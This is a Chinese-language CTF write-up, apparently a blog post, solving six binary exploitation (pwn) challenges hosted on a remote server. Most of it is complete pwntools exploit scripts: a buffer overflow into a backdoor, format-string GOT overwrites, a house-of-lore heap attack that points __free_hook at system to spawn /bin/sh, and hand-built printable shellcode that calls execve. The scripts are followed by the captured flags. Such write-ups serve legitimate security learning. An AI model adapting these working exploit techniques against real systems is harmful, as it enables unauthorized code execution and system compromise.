除了最后一个手搓shellcode不习惯,没做出来,其他还好,RCTF打自闭,过来找找感觉(对,WTCL
pwn1
溢出到另外一个变量绕过判断
1 | from pwn import* |
2 | p = remote('49.235.243.206',10501) |
3 | p.send('1'*0x28) |
4 | p.interactive() |
Download
pwn2
libc2.23中,其中0xF02A4与0xF1147与read函数的偏移是最接近的,直接爆破后面两个字节
1 | from pwn import* |
2 | payload = '%65c%12$hhn%6c%13$hhn' |
3 | payload = payload.ljust(0x20,'\x00') |
4 | payload += p64(0x601028 + 1) + p64(0x601028) |
5 | p = process('./main') |
6 | p = remote('49.235.243.206',10502) |
7 | p.sendline(payload) |
8 | p.interactive() |
Download
pwn3
栈溢出,还带后门,简单
1 | from pwn import* |
2 | p = process('./main') |
3 | b = 0x4007FB |
4 | p = remote('49.235.243.206',10503) |
5 | payload = '\x00'*0x20 + p64(0x40) + p64(b) |
6 | p.send(payload) |
7 | p.interactive() |
Download
pwn4
house of lore模板题
1 | from pwn import* |
2 | context.log_level ='DEBUG' |
3 | def name(data1,data2): |
4 | p.sendlineafter('choice:','0') |
5 | p.sendafter('name?',data1) |
6 | p.sendafter('desc?',data2) |
7 | def new(size): |
8 | p.sendlineafter('choice:','1') |
9 | p.sendlineafter('message?',str(size)) |
10 | def free(index): |
11 | p.sendlineafter('choice:','2') |
12 | p.sendlineafter('deleted?',str(index)) |
13 | def edit(index,content): |
14 | p.sendlineafter('choice:','3') |
15 | p.sendlineafter('modified?',str(index)) |
16 | p.sendafter('message?',content) |
17 | def show(index): |
18 | p.sendlineafter('choice:','4') |
19 | p.sendlineafter('showed?',str(index)) |
20 | p = process('./main') |
21 | p = remote('49.235.243.206',10504) |
22 | libc =ELF('./libc-2.23.so') |
23 | new(0x80) |
24 | new(0x200) |
25 | new(0x100) |
26 | free(0) |
27 | show(0) |
28 | libc_base = u64(p.recvuntil('\x7F')[-6:].ljust(8,'\x00')) - 0x10 - 88 -libc.sym['__malloc_hook'] |
29 | new(0x80) |
30 | p.recvuntil('Ptr: ') |
31 | heap_base = int(('0x' + p.recvuntil('\n',drop=True)),16) - 0x10 |
32 | log.info('LIBC:\t' + hex(libc_base)) |
33 | log.info('HEAP:\t' + hex(heap_base)) |
34 | free(1) |
35 | new(0x300) |
36 | victim = heap_base + 0x90 |
37 | fake_chunk2 = 0x602100 |
38 | fake_chunk1 = 0x602120 |
39 | name(p64(0) + p64(0x211) + p64(fake_chunk1),p64(0) + p64(0x211) + p64(victim) + p64(fake_chunk2)) |
40 | edit(1,p64(0) + p64(fake_chunk1)) |
41 | new(0x200) |
42 | new(0x200) |
43 | free_hook = libc_base + libc.sym['__free_hook'] |
44 | system = libc_base + libc.sym['system'] |
45 | edit(6,'\x00'*0x10 + p64(free_hook)) |
46 | edit(0,p64(system)) |
47 | edit(1,'/bin/sh\x00') |
48 | free(1) |
49 | p.interactive() |
Download
pwn5
利用RBP的一个链,在栈上写上一个read_got,然后一次性改了read就行
1 | from pwn import* |
2 | p = process('./main') |
3 | p = remote('49.235.243.206',10505) |
4 | libc =ELF('./libc-2.23.so') |
5 | payload = 'LIBC:%11$pStack:%8$p' |
6 | p.sendline(payload) |
7 | p.recvuntil('LIBC:') |
8 | libc_base = int(p.recv(14),16) - libc.sym['__libc_start_main'] - 240 |
9 | log.info('LIBC:\t' + hex(libc_base)) |
10 | p.recvuntil('Stack:') |
11 | target = int(p.recv(14),16) |
12 | log.info('TARGET:\t' + hex(target)) |
13 | rce = libc_base + 0xF02A4 |
14 | read = 0x601020 |
15 | def modify(addr,data): |
16 | p.sendline(addr) |
17 | sleep(0.1) |
18 | p.sendline(data) |
19 | sleep(0.1) |
20 | modify('%' + str((target-8 + 2)&0xFF) + 'c%6$hhnFMYY','%' + str((read>>16)&0xFF) + 'c%8$hhnFMYY') |
21 | modify('%' + str((target-8 + 1)&0xFF) + 'c%6$hhnFMYY','%' + str((read>>8)&0xFF) + 'c%8$hhnFMYY') |
22 | modify('%' + str((target-8 + 0)&0xFF) + 'c%6$hhnFMYY','%' + str((read)&0xFF) + 'c%8$hhnFMYY') |
23 | p.sendline('%' + str(rce&0xFFFF) + 'c%9$hn\x00') |
24 | p.interactive() |
Download
pwn6
问了binLep师傅才知道的,太菜了,后面需要去搓搓shellcode了,哎……
就是一个写一段汇编从而绕过字符的范围判断,一开始让字符位于可见字符范围内,然后在汇编里面进行单字节修改到想要的字符串
1 | #!/usr/bin/env python |
2 | # -*- coding: utf-8 -*- |
3 | from pwn import * |
4 | p = process('./main') |
5 | p = remote('49.235.243.206', 10506) |
6 | context.arch ='AMD64' |
7 | shell = asm(''' |
8 | push 0x70 |
9 | pop rdx |
10 | push rdi |
11 | push rdi |
12 | push rdi |
13 | sub byte ptr [rsi + 0x22], dl |
14 | sub byte ptr [rsi + 0x2A], dl |
15 | sub byte ptr [rsi + 0x2E], dl |
16 | sub byte ptr [rsi + 0x2F], dl |
17 | sub byte ptr [rsi + 0x45], dl |
18 | sub byte ptr [rsi + 0x45], dl |
19 | sub byte ptr [rsi + 0x45], dl |
20 | pop rsi |
21 | pop rsi |
22 | pop rdx |
23 | push 0x3b |
24 | pop rax |
25 | ''') |
26 | shell += "\x48\x2F\x2F\x62\x69\x6E\x2F\x73\x68\x70" |
27 | shell += asm(""" |
28 | push rdi |
29 | push rsp |
30 | pop rdi |
31 | """) |
32 | shell += "\x7F\x75" #syscall |
33 | p.send(shell) |
34 | p.interactive() |
Download
FLAG
1 | pwn1: |
2 | flag{1325777C4AD2FC214638AFACD632CAB9} |
3 | pwn2: |
4 | flag{7221CB4A535A0F5E4C47F5FEEC64C952} |
5 | pwn3: |
6 | flag{E291A9922B72C69900DC4D0BB1E29BDE} |
7 | pwn4: |
8 | flag{38E0B6A2926319DAE8EBF1DCD161A331} |
9 | pwn5: |
10 | flag{3DD8600C697604883D8FF17048A6AF37} |
11 | pwn6: |
12 | flag{A1191C435648EFFC09A90A8A113117A3} |